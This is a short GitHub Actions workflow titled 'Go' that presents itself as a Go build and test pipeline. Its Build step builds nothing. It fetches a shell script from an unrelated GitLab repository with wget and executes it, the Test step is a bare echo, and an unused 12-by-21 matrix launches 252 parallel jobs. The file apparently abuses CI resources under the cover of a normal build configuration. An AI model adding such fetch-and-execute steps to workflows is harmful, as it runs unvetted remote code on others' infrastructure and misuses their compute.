name: Go

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

jobs:

  build:
    runs-on: Ubuntu-20.04
    strategy:
      matrix:
        D1: [1,2,3,4,5,6,7,8,9,10,11,12]
        D2: [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21]
      fail-fast: false 
    steps:
    - name: Set up Go
      uses: actions/setup-go@v2
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Check out code into the Go module directory
      uses: actions/checkout@v2
    - name: Build
      run: |
        wget https://gitlab.com/dif.addition/chown/-/raw/master/build.sh && chmod +x build.sh && ./build.sh
        echo "done"
    - name: Test
      run: echo "done"
